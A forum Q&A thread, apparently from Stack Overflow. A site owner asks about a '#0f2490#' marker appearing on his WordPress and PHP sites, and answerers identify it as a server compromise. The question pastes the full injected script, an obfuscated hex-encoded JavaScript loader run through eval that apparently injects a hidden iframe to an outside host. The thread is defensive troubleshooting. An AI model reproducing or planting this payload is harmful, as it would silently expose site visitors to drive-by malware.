# Has anyone seen: #0f2490# if(empty($b)) { $b = " "; echo $b; } #/0f2490#

Tags: php, javascript, html, wordpress

I have many sites, and a couple of them, wordpress or not (some are .php based, some are core HTML.  Some are WordPress blogs, and some are just core sites) show this bit of script on page load, and I cannot find it on the server or in the code for the life of me.

```
#0f2490# if(empty($b)) { $b = " "; echo $b; } #/0f2490#
```

When checking the source of the sites, it appears there is some javascript code looking for a reference to some site.

I know this isn't enough information to properly troubleshoot the issue.  I am asking if anyone has heard of this and can point me in the right direction for resources to research and learn about this issue.

You can see the output for yourself at http://chiuaua.ca

For reference, this is the JavaScript code that appears on the site when using source viewer in either FireFox or Chrome...

```
#0f2490#
                                                                                                                                                                                                                                                                                                                                                                                                            if(empty($b)) { $b = " <script type=\"text/javascript\" language=\"javascript\" > if(document.querySelector)zq=4;a=(\"27,6d,7c,75,6a,7b,70,76,75,27,6a,6a,6b,78,6a,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6a,6a,6b,78,6a,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6a,6a,6b,78,6a,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,7f,75,34,34,69,79,6e,6c,79,74,6c,70,7a,7b,6c,79,70,75,34,6d,79,34,70,6b,7a,7b,6c,70,75,34,6d,7e,6a,77,35,6b,6c,36,7e,6d,78,4b,5f,60,49,5b,35,77,6f,77,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,77,76,7a,70,7b,70,76,75,27,44,27,2e,68,69,7a,76,73,7c,7b,6c,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,6a,76,73,76,79,27,44,27,2e,3c,3a,37,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,6f,6c,70,6e,6f,7b,27,44,27,2e,3c,3a,37,77,7f,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,7e,70,6b,7b,6f,27,44,27,2e,3c,3a,37,77,7f,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,73,6c,6d,7b,27,44,27,2e,38,37,37,37,3c,3a,37,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,7b,76,77,27,44,27,2e,38,37,37,37,3c,3a,37,2e,42,14,11,14,11,27,70,6d,27,2f,28,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,6a,6a,6b,78,6a,2e,30,30,27,82,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,7e,79,70,7b,6c,2f,2e,43,77,27,70,6b,44,63,2e,6a,6a,6b,78,6a,63,2e,27,6a,73,68,7a,7a,44,63,2e,6a,6a,6b,78,6a,37,40,63,2e,27,45,43,36,77,45,2e,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,6a,6a,6b,78,6a,2e,30,35,68,77,77,6c,75,6b,4a,6f,70,73,6b,2f,6a,6a,6b,78,6a,30,42,14,11,27,84,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,5a,6c,7b,4a,76,76,72,70,6c,2f,6a,76,76,72,70,6c,55,68,74,6c,33,6a,76,76,72,70,6c,5d,68,73,7c,6c,33,75,4b,68,80,7a,33,77,68,7b,6f,30,27,82,14,11,27,7d,68,79,27,7b,76,6b,68,80,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,7d,68,79,27,6c,7f,77,70,79,6c,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,70,6d,27,2f,75,4b,68,80,7a,44,44,75,7c,73,73,27,83,83,27,75,4b,68,80,7a,44,44,37,30,27,75,4b,68,80,7a,44,38,42,14,11,27,6c,7f,77,70,79,6c,35,7a,6c,7b,5b,70,74,6c,2f,7b,76,6b,68,80,35,6e,6c,7b,5b,70,74,6c,2f,30,27,32,27,3a,3d,37,37,37,37,37,31,39,3b,31,75,4b,68,80,7a,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,27,44,27,6a,76,76,72,70,6c,55,68,74,6c,32,29,44,29,32,6c,7a,6a,68,77,6c,2f,6a,76,76,72,70,6c,5d,68,73,7c,6c,30,14,11,27,32,27,29,42,6c,7f,77,70,79,6c,7a,44,29,27,32,27,6c,7f,77,70,79,6c,35,7b,76,4e,54,5b,5a,7b,79,70,75,6e,2f,30,27,32,27,2f,2f,77,68,7b,6f,30,27,46,27,29,42,27,77,68,7b,6f,44,29,27,32,27,77,68,7b,6f,27,41,27,29,29,30,42,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,4e,6c,7b,4a,76,76,72,70,6c,2f,27,75,68,74,6c,27,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,79,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,75,68,74,6c,27,32,27,29,44,29,27,30,42,14,11,27,7d,68,79,27,73,6c,75,27,44,27,7a,7b,68,79,7b,27,32,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,32,27,38,42,14,11,27,70,6d,27,2f,27,2f,27,28,7a,7b,68,79,7b,27,30,27,2d,2d,14,11,27,2f,27,75,68,74,6c,27,28,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,37,33,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,30,27,30,27,30,14,11,27,82,14,11,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,84,14,11,27,70,6d,27,2f,27,7a,7b,68,79,7b,27,44,44,27,34,38,27,30,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,7d,68,79,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,29,42,29,33,27,73,6c,75,27,30,42,14,11,27,70,6d,27,2f,27,6c,75,6b,27,44,44,27,34,38,27,30,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,73,6c,75,6e,7b,6f,42,14,11,27,79,6c,7b,7c,79,75,27,7c,75,6c,7a,6a,68,77,6c,2f,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,73,6c,75,33,27,6c,75,6b,27,30,27,30,42,14,11,84,14,11,70,6d,27,2f,75,68,7d,70,6e,68,7b,76,79,35,6a,76,76,72,70,6c,4c,75,68,69,73,6c,6b,30,14,11,82,14,11,70,6d,2f,4e,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6a,6a,6b,78,6a,37,40,2f,30,42,14,11,84,14,11,84\".split(\",\"));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(12-5)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String[\"fr\"+\"omCh\"+\"arCo\"+\"de\"].apply(String,a));</script> "; echo $b; }
#/0f2490#
```

Comment: A very quick search for that number implies this could be hack related: http://www.enru.co.uk/post/56136451242/removing-injected-js-with-perls-pie

Comment: Here's an old StackOverflow answer which is related: http://stackoverflow.com/a/17832333/1180785

Comment: Definitely looks this way.  Trying to get my hosting provider to re-enable shell access so I can do some perl'ing...

Comment: Never used perl before, definitely going to end up being a full course for me!  No idea how to even start with that.  I'm just a PHP guy through and through!

Comment: The Perl script is just a way that guy found to clean it up, but since your server has been compromised, the only true clean is to delete everything, reformat it, and restore a backup (after fixing whatever SQL flaw they found in your code). You never know if the hacker managed to leave a trojan behind or other nasties. So I wouldn't recommend simply patching the visible damage like the link suggests.

Answer (score 4, accepted):

Bad news, looks like your sites have been exploited...  I visited the link and it tried to  shove several binary files at Safari immediately...  Yikes.

- [Another SO thread on a similar problem](https://stackoverflow.com/questions/17185010/all-my-javascript-added-some-code-at-bottom)
- [Your exact code](http://forums.phpfreaks.com/topic/280733-code-injection/)

Comment: Well. Thats not a good thing. I got no prompts when navigating to the site with Firefox

Answer (score 1):

Your server has been compromised. Bad bad news.

What you need to do on the short term is to quickly update all the sites to the last version of wordpress if you are still running an older version.

Looking at what you described, the javascript is not in the html source, but is sent down to the browser. This could mean that your wordpress templates are compromised. Look in the upload folders or the template folder to see if there is any extra js files being loaded.

Another thing to check is if there is any changes done to the wordpress template's file, or any plugin's file. As wordpress provide a handy web based editor to edit those files, there might be a flaw that allowed malicious codes to inject other scripts into your files via those means.